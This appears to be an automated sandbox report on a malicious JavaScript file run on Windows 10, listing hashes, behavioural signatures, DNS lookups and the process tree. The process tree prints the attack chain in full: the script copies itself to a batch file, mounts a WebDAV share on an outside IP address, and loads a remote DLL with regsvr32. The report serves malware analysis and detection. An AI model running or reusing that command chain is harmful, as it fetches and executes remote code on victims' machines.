Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240704-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09/07/2024, 05:58 UTC

General

  • Target

    2035815001653724469.js

  • Size

    5KB

  • MD5

    770f45a1e4733444a42eb7d7d3a87981

  • SHA1

    b6dc3b63d358eb911494ec3a6899ec1a34ca3a64

  • SHA256

    79f047e7fe22c18d409498ea601c2dac3022d58e8539636d36b94f70e1a82ec7

  • SHA512

    dcc59b0944f1117efdc1510fa36e71e039532a143276a69673b36a2c4724aa1408d754bbd64ac4bcff85a1807e808e4c4f1f683c00e8667e42855b0569984ec3

  • SSDEEP

    96:O4CeNKhGUpMeEpMkjozmDpZPqY/6mlhsmlA2pmlh1QMOm5k2MOmE:ZKFW7hwCRmPBkHc

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs net.exe
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\2035815001653724469.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:5004
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\2035815001653724469.js" "C:\Users\Admin\\wqhjmm.bat" && "C:\Users\Admin\\wqhjmm.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1284
      • C:\Windows\system32\net.exe
        net use \\45.9.74.13@8888\DavWWWRoot\
        3⤵
          PID:3800
        • C:\Windows\system32\regsvr32.exe
          regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\701.dll
          3⤵
            PID:3220

      Network

      • flag-us
        DNS
        76.32.126.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        76.32.126.40.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        73.144.22.2.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        73.144.22.2.in-addr.arpa
        IN PTR
        Response
        73.144.22.2.in-addr.arpa
        IN PTR
        a2-22-144-73deploystaticakamaitechnologiescom
      • flag-us
        DNS
        55.36.223.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        55.36.223.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        183.59.114.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        183.59.114.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        15.164.165.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        15.164.165.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        147.142.123.92.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        147.142.123.92.in-addr.arpa
        IN PTR
        Response
        147.142.123.92.in-addr.arpa
        IN PTR
        a92-123-142-147deploystaticakamaitechnologiescom
      • flag-us
        DNS
        172.210.232.199.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        172.210.232.199.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        11.227.111.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        11.227.111.52.in-addr.arpa
        IN PTR
        Response
      No results found
      • 8.8.8.8:53
        76.32.126.40.in-addr.arpa
        dns
        71 B
        157 B
        1
        1

        DNS Request

        76.32.126.40.in-addr.arpa

      • 8.8.8.8:53
        73.144.22.2.in-addr.arpa
        dns
        70 B
        133 B
        1
        1

        DNS Request

        73.144.22.2.in-addr.arpa

      • 8.8.8.8:53
        55.36.223.20.in-addr.arpa
        dns
        71 B
        157 B
        1
        1

        DNS Request

        55.36.223.20.in-addr.arpa

      • 8.8.8.8:53
        183.59.114.20.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        183.59.114.20.in-addr.arpa

      • 8.8.8.8:53
        15.164.165.52.in-addr.arpa
        dns
        72 B
        146 B
        1
        1

        DNS Request

        15.164.165.52.in-addr.arpa

      • 8.8.8.8:53
        147.142.123.92.in-addr.arpa
        dns
        73 B
        139 B
        1
        1

        DNS Request

        147.142.123.92.in-addr.arpa

      • 8.8.8.8:53
        172.210.232.199.in-addr.arpa
        dns
        74 B
        128 B
        1
        1

        DNS Request

        172.210.232.199.in-addr.arpa

      • 8.8.8.8:53
        11.227.111.52.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        11.227.111.52.in-addr.arpa

      • 8.8.8.8:53

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\wqhjmm.bat

        Filesize

        5KB

        MD5

        770f45a1e4733444a42eb7d7d3a87981

        SHA1

        b6dc3b63d358eb911494ec3a6899ec1a34ca3a64

        SHA256

        79f047e7fe22c18d409498ea601c2dac3022d58e8539636d36b94f70e1a82ec7

        SHA512

        dcc59b0944f1117efdc1510fa36e71e039532a143276a69673b36a2c4724aa1408d754bbd64ac4bcff85a1807e808e4c4f1f683c00e8667e42855b0569984ec3

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.